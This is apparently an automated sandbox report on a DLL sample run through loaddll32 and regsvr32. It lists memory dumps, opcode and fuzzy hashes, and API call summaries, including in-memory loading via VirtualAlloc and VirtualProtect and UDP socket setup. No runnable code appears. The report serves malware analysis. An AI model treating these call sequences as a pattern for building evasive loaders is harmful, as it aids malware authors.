                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Wm
                          • API String ID: 0-1953712011
                          • Opcode ID: 5f458415f00c48274a736efb525796b6a242fc0a9122d131060991abe7e8c2f8
                          • Instruction ID: 3cc0ca06ffde76841856271cd6c56c94892c74813689d75d3a05ab231df08deb
                          • Opcode Fuzzy Hash: 5f458415f00c48274a736efb525796b6a242fc0a9122d131060991abe7e8c2f8
                          • Instruction Fuzzy Hash: A621C071D01319EBDB599FE4D84A4EEBFB1FB00318F108699E86566250D7B50B88DF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 093d82f95d62312768d893bf8c84c3e2e2046d03e20daec24e1e81ca69d6cf6d
                          • Instruction ID: 19d7fef3ffbf923bf600d608347345b000ac39748805f22233be36a56d9920bd
                          • Opcode Fuzzy Hash: 093d82f95d62312768d893bf8c84c3e2e2046d03e20daec24e1e81ca69d6cf6d
                          • Instruction Fuzzy Hash: EF5153761093029FC714DF21D88A41FBBE1FBD4B58F444A2CF19A66221D7B58A09CF97
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5a8d4eabc7a54cb61cf707b53b9e1c7bfad035d08295eabb998074a080e979cd
                          • Instruction ID: 06b1ecd9bb1eefad4539a7062c04a84fd04b52a911860a872fe3d41b335cc1f7
                          • Opcode Fuzzy Hash: 5a8d4eabc7a54cb61cf707b53b9e1c7bfad035d08295eabb998074a080e979cd
                          • Instruction Fuzzy Hash: 7741FE75D0122DEBCF04DFA5D94A4DEBFB2FB48314F108199D521B6220D3B90A59DFA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 37e89cb84dd8fa63864b63d4cf921de512c7c968c9f482bdb6f048739d92c7a5
                          • Instruction ID: 3c2319280bd412416ce1b64a30f4343e8d84b2b0a17f37d388ae7b5d84c44bf5
                          • Opcode Fuzzy Hash: 37e89cb84dd8fa63864b63d4cf921de512c7c968c9f482bdb6f048739d92c7a5
                          • Instruction Fuzzy Hash: 3F3189726093408FC305CF28C48595BFBE0FB88714F454B6DF88AA7221D774EA49CBA6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 69d5b5b74808eb49daa8270ee7dfe51a587ad052fe83dd9d48b36d2eab0a3116
                          • Instruction ID: 72ccbb229bf1c7e8e2579bfb0f99c0b755251f31cc6de697e882b846bfd1f0fe
                          • Opcode Fuzzy Hash: 69d5b5b74808eb49daa8270ee7dfe51a587ad052fe83dd9d48b36d2eab0a3116
                          • Instruction Fuzzy Hash: 26319A726093408FD718DF29C98640BBBE2FFC8718F044B2DF489A3214DB74DA058B56
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f7bc40e7220c11a054e5cb1e3d04733d7eea9a3290a44af2851a921ba079d4ed
                          • Instruction ID: 920263b8721cd2adba2405fb71fe13766616729919b5949177a56d774a60996c
                          • Opcode Fuzzy Hash: f7bc40e7220c11a054e5cb1e3d04733d7eea9a3290a44af2851a921ba079d4ed
                          • Instruction Fuzzy Hash: E6212676E00209EBDF08CFE5C80A9DEBBB2EB44314F20C0AAE5146B290D7B15B14DF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f55cd74c2952393ab5aca3dee7201afe3819bdbfddab02328eb5f9b09f94cb42
                          • Instruction ID: 9212189ff8a70a17ad10bdbd969a02812516360658dc62d2a395ef048cbcf58a
                          • Opcode Fuzzy Hash: f55cd74c2952393ab5aca3dee7201afe3819bdbfddab02328eb5f9b09f94cb42
                          • Instruction Fuzzy Hash: F8315972E00209EFDB58DFA5D88A8AEFBB1FB40314F2480A9D515B7211D3B45F558F90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 28b9a31d6d310fd66289eca8aff00d608e2121ecbf4137da26fc55f628ae5085
                          • Instruction ID: 2cd2ee0d03a3df81e5e831630fe7751110921152ef6e2bdabcce90cb36cdc1a5
                          • Opcode Fuzzy Hash: 28b9a31d6d310fd66289eca8aff00d608e2121ecbf4137da26fc55f628ae5085
                          • Instruction Fuzzy Hash: FD211F71801219FBCF19DFA1CD4A8CFBFB4FF18354F108688E958A2260D3798A14DBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:7.7%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:6.4%
                          Total number of Nodes:873
                          Total number of Limit Nodes:39

                          Graph

HeapAlloc 10626->10627 10628 10002f07 VirtualAlloc 10626->10628 10631 10002f6c 10627->10631 10632 10002f4c VirtualFree SetLastError 10627->10632 10628->10627 10629 10002f23 SetLastError 10628->10629 10629->10638 10633 100024a0 SetLastError 10631->10633 10632->10638 10634 10002fce 10633->10634 10635 10002fdc VirtualAlloc 10634->10635 10643 10002fd2 10634->10643 10636 1000300b 10635->10636 10648 100024d0 10636->10648 10640 1000303f 10640->10643 10658 100027c0 10640->10658 10642 100030a8 10642->10643 10644 1000310f SetLastError 10642->10644 10643->10638 10664 10003310 10643->10664 10644->10643 10646 100024bb 10645->10646 10647 100024af SetLastError 10645->10647 10646->10615 10646->10616 10646->10638 10647->10646 10649 10002500 10648->10649 10650 10002593 10649->10650 10652 1000253c VirtualAlloc 10649->10652 10657 100025b0 10649->10657 10651 100024a0 SetLastError 10650->10651 10653 100025ac 10651->10653 10654 10002560 10652->10654 10655 10002567 10652->10655 10656 100025b4 VirtualAlloc 10653->10656 10653->10657 10654->10657 10655->10649 10656->10657 10657->10640 10662 10002808 10658->10662 10659 10002911 10660 10002690 2 API calls 10659->10660 10661 100028ed 10660->10661 10661->10642 10662->10659 10662->10661 10672 10002690 10662->10672 10665 10003325 10664->10665 10670 1000332a 10664->10670 10665->10638 10666 100033c0 VirtualFree 10667 100033d4 HeapFree 10666->10667 10667->10665 10671 100033b4 10670->10671 10679 10002370 10670->10679 10671->10666 10671->10667 10673 100026ac 10672->10673 10674 100026a2 10672->10674 10676 10002714 VirtualProtect 10673->10676 10677 100026ba 10673->10677 10674->10662 10676->10674 10677->10674 10678 100026f2 VirtualFree 10677->10678 10678->10674 10680 10002379 VirtualFree 10679->10680 10681 1000238a 10679->10681 10680->10681 10681->10671

                          Executed Functions

                          Control-flow Graph

                          [control-flow graph; entry block 10002d40-10002d67]
                          APIs
                            • Part of subcall function 100024A0: SetLastError.KERNEL32(0000000D,?,?,10002D65,1001DF0A,00000040), ref: 100024B1
                          • SetLastError.KERNEL32(000000C1,1001DF0A,00000040), ref: 10002D88
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp
                          • Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp
                          • Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp
                          • Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp
                          • Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp
                          • Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp
                          • Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                          Similarity
                          • API ID: ErrorLast
                          • String ID: Oxt$`Nxt
                          • API String ID: 1452528299-513543937
                          • Opcode ID: 6650c2dd50d65ac3f23d73d252b9ed4773b7d6bfb551cac519879840267a53eb
                          • Instruction ID: 8eda3ac1f8f3e078098bdc719848e1594ce6d4798074e02e4610946cd2a58ef5
                          • Opcode Fuzzy Hash: 6650c2dd50d65ac3f23d73d252b9ed4773b7d6bfb551cac519879840267a53eb
                          • Instruction Fuzzy Hash: 7CE1E774A00209DFEB05CF94C994AAEB7B6FF8C344F208559E909AB399D770ED42CB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • EnterCriticalSection.KERNEL32(100863DC,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002ADBF
                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AE15
                          • GlobalHandle.KERNEL32(02465818), ref: 1002AE1E
                          • GlobalUnlock.KERNEL32(00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE28
                          • GlobalReAlloc.KERNEL32 ref: 1002AE41
                          • GlobalHandle.KERNEL32(02465818), ref: 1002AE53
                          • GlobalLock.KERNEL32 ref: 1002AE5A
                          • LeaveCriticalSection.KERNEL32(?,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE63
                          • GlobalLock.KERNEL32 ref: 1002AE6F
                          • _memset.LIBCMT ref: 1002AE89
                          • LeaveCriticalSection.KERNEL32(?), ref: 1002AEB7
                          Memory Dump Source
                          • Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          Similarity
                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                          • String ID:
                          • API String ID: 496899490-0
                          • Opcode ID: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
                          • Instruction ID: 1a22abfe9f33a297b41a0f192d06fc5d98366496c497f4e189800256e1e6bccf
                          • Opcode Fuzzy Hash: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
                          • Instruction Fuzzy Hash: 1E31AD71600715AFEB21CF68DD89A1BBBF9FF46301B42892DE55AD3661DB30F8818B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • __lock.LIBCMT ref: 1002E595
                            • Part of subcall function 10035865: __mtinitlocknum.LIBCMT ref: 1003587B
                            • Part of subcall function 10035865: __amsg_exit.LIBCMT ref: 10035887
                            • Part of subcall function 10035865: EnterCriticalSection.KERNEL32(00000000,00000000,?,1003481B,0000000D,1004E828,00000008,10034912,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 1003588F
                          • ___sbh_find_block.LIBCMT ref: 1002E5A0
                          • ___sbh_free_block.LIBCMT ref: 1002E5AF
                          • RtlFreeHeap.NTDLL(00000000,00000000,1004E648,0000000C,10034761,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 1002E5DF
                          • GetLastError.KERNEL32(?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880,00000000,00000000,?,1003481B,0000000D), ref: 1002E5F0
                          Memory Dump Source
                          • Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          Similarity
                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 2714421763-0
                          • Opcode ID: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
                          • Instruction ID: 15e9110145b1e9c1bde58837c3f2254f90dacbefcca8cfa7097211139088966e
                          • Opcode Fuzzy Hash: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
                          • Instruction Fuzzy Hash: E001A7358567669EEB21DBB1AC0574D3BE4FF01796F900415F404AA4D1DF34AD40CB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          [control-flow graph; entry block 100036a0-100036bb]
                          APIs
                          • _malloc.LIBCMT ref: 100036BB
                            • Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
                            • Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
                            • Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          Similarity
                          • API ID: AllocateHeap_malloc
                          • String ID: +';
                          • API String ID: 501242067-2694261586
                          • Opcode ID: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
                          • Instruction ID: 8c5fde967666ed0afc5dc7c826d0591e9b318715144b3c37a2536eafdc0580d3
                          • Opcode Fuzzy Hash: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
                          • Instruction Fuzzy Hash: 8FB21B369120218FE70ADFACDED5F257BA6F794608747B21FC4018737ADE306464CA5A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          [control-flow graph; entry block 10003440-1000344d]
                          APIs
                            • Part of subcall function 100033F0: _malloc.LIBCMT ref: 100033F9
                          • _malloc.LIBCMT ref: 100034B7
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          Similarity
                          • API ID: _malloc
                          • String ID: +';
                          • API String ID: 1579825452-2694261586
                          • Opcode ID: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
                          • Instruction ID: 6db3f6523064f320fd84e53d4013fc8a18f56f5699846b59c9fd9a4c566afa3d
                          • Opcode Fuzzy Hash: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
                          • Instruction Fuzzy Hash: B891E770E04649AFDB09CF98C490AAEBBB2FF85345F24C199D915AB359C335AA90CF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          [control-flow graph; entry block 10002690-100026a0]
                          APIs
                          • VirtualFree.KERNELBASE(00000000,?,00004000,?,10002928,00000001,00000000,?,100030A8,?,?,?,?,100030A8,00000000,00000000), ref: 10002704
                          Memory Dump Source
                          • Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          Similarity
                          • API ID: FreeVirtual
                          • String ID:
                          • API String ID: 1263568516-0
                          • Opcode ID: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
                          • Instruction ID: e47a27f64338b3e84d430cb899d867ed3d67d72a97b2c0655aeaec8263a425f7
                          • Opcode Fuzzy Hash: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
                          • Instruction Fuzzy Hash: 8841B77461410AAFEB48CF58C490BA9B7B2FB88364F14C659EC1A9F355C731EE41CB84
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          [control-flow graph; entry block 100024d0-100024fe]
                          APIs
                          • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000303F,00000000), ref: 10002551
                          • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,1001DF0A,8B118BBC,?,1000303F,00000000,1001DF0A,?), ref: 100025CC
                          Memory Dump Source
                          • Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
                          • Instruction ID: f227e8c1e280d8d0b8d11f9a2f1445d4c625449e48c39147985fdcb30a9e5b67
                          • Opcode Fuzzy Hash: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
                          • Instruction Fuzzy Hash: FE51E9B4A0010AEFDB04CF94C990AAEB7F1FF48345F248598E905AB345D370EE91CBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • __EH_prolog3_catch.LIBCMT ref: 10024BD7
                            • Part of subcall function 10020421: _malloc.LIBCMT ref: 1002043F
                            • Part of subcall function 1002AC5C: LocalAlloc.KERNEL32(00000040,?,?,1002AFE7,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AC66
                            • Part of subcall function 100248E2: __EH_prolog3.LIBCMT ref: 100248E9
                          Memory Dump Source
                          • Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          Similarity
                          • API ID: AllocH_prolog3H_prolog3_catchLocal_malloc
                          • String ID:
                          • API String ID: 1104862767-0
                          • Opcode ID: fd7fb294918823335492a66fe64f990aaa4eeed4153628f3b589ca3afe8965ee
                          • Instruction ID: a1f779584784c66b6c6d6693aa33ee417c0f7bf9ec3ebef889974536428868aa
                          • Opcode Fuzzy Hash: fd7fb294918823335492a66fe64f990aaa4eeed4153628f3b589ca3afe8965ee
                          • Instruction Fuzzy Hash: 87317AB4A05B40CFD761CF69904125EFBF0FF94700FA08A1EA19A87791CB71A640CB15
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          [control-flow graph; entry block 1001fb60-1001fba1]
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          Similarity
                          • API ID: _memcpy_s
                          • String ID:
                          • API String ID: 2001391462-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 254 1002b0bb-1002b0d3 call 10030535 257 1002b0d5 call 10023b5b 254->257 258 1002b0da-1002b0dd 254->258 257->258 259 1002b115-1002b126 call 1002ac8f 258->259 260 1002b0df-1002b0e7 258->260 270 1002b13b-1002b142 call 1003060d 259->270 271 1002b128-1002b136 call 1002af6b 259->271 262 1002b10a call 1002adac 260->262 263 1002b0e9-1002b108 call 1002aec4 260->263 269 1002b10f-1002b113 262->269 263->257 263->262 269->257 269->259 271->270
                          APIs
                          • __EH_prolog3.LIBCMT ref: 1002B0C2
                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                          Similarity
                          • API ID: Exception@8H_prolog3Throw
                          • String ID:
                          • API String ID: 3670251406-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 276 10008000-1000801a call 1002e654 279 10008023-10008037 276->279 280 1000801c-10008021 276->280 282 1000804b-10008052 279->282 281 1000807b-1000807e 280->281 283 10008054-1000805c 282->283 284 1000805e-10008062 call 1002e577 282->284 283->282 287 10008067-10008070 284->287 288 10008072-10008074 287->288 289 10008076 287->289 288->281 289->281
                          APIs
                          • _malloc.LIBCMT ref: 1000800B
                            • Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
                            • Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
                            • Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB
                          Similarity
                          • API ID: AllocateHeap_malloc
                          • String ID:
                          • API String ID: 501242067-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 290 100236ce-100236dc 291 100236e2-100236ed call 1002e654 290->291 292 100236de-100236e0 290->292 295 100236f2-100236f5 291->295 293 10023707-1002370a 292->293 295->292 296 100236f7-10023704 295->296 296->293
                          APIs
                          Similarity
                          • API ID: _malloc
                          • String ID:
                          • API String ID: 1579825452-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 297 1002acfb-1002ad0d call 10030568 300 1002ad30-1002ad37 call 1003060d 297->300 301 1002ad0f-1002ad1e call 1002a6ab 297->301 306 1002ad20 call 10024d0b 301->306 307 1002ad25-1002ad2b call 1002a71d 301->307 309 1002ad23 306->309 307->300 309->307
                          APIs
                          • __EH_prolog3_catch.LIBCMT ref: 1002AD02
                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
                            • Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
                            • Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714
                          Similarity
                          • API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
                          • String ID:
                          • API String ID: 1641187343-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 311 10035645-10035667 HeapCreate 312 1003566b-10035674 311->312 313 10035669-1003566a 311->313
                          APIs
                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,1002E896,00000001,?,?,?,1002EA0F,?,?,?,1004E6A8,0000000C,1002EACA), ref: 1003565A
                          Similarity
                          • API ID: CreateHeap
                          • String ID:
                          • API String ID: 10892065-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          APIs
                          • WSAStartup.WS2_32(?,?), ref: 10001194
                          • _memset.LIBCMT ref: 100011A8
                          • htonl.WS2_32(00000000), ref: 100011C1
                          • htons.WS2_32(?), ref: 100011D5
                          • socket.WS2_32(00000002,00000002,00000000), ref: 100011EB
                          • bind.WS2_32(?,?,00000010), ref: 10001210
                          • setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 10001252
                          Similarity
                          • API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
                          • String ID:
                          • API String ID: 1003240404-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _strcpy_s.LIBCMT ref: 100212CD
                            • Part of subcall function 100210FF: __CxxThrowException@8.LIBCMT ref: 10023B71
                            • Part of subcall function 100210FF: __cftof.LIBCMT ref: 10023B88
                            • Part of subcall function 10030D24: __getptd_noexit.LIBCMT ref: 10030D24
                          • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 100212E5
                          • __snwprintf_s.LIBCMT ref: 1002131A
                          • LoadLibraryA.KERNEL32(?), ref: 10021355
                          Strings
                          Similarity
                          • API ID: Exception@8InfoLibraryLoadLocaleThrow__cftof__getptd_noexit__snwprintf_s_strcpy_s
                          • String ID: LOC
                          • API String ID: 1016519223-519433814
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadResource.KERNEL32(00000000,?,?,1002120D,00000000,00000000,?,?,1002189A,00000000,?,?,?,?,10021950,00000000), ref: 1002118E
                          • LockResource.KERNEL32(00000000,?,?,1002120D,00000000,00000000,?,?,1002189A,00000000,?,?,?,?,10021950,00000000), ref: 1002119C
                          • SizeofResource.KERNEL32(00000000,?,?,1002120D,00000000,00000000,?,?,1002189A,00000000,?,?,?,?,10021950,00000000), ref: 100211AE
                          Similarity
                          • API ID: Resource$LoadLockSizeof
                          • String ID:
                          • API String ID: 2853612939-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • recvfrom.WS2_32(?,?,00000400,00000000,?,00000010), ref: 100012CF
                          Similarity
                          • API ID: recvfrom
                          • String ID:
                          • API String ID: 846543921-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 100214D5
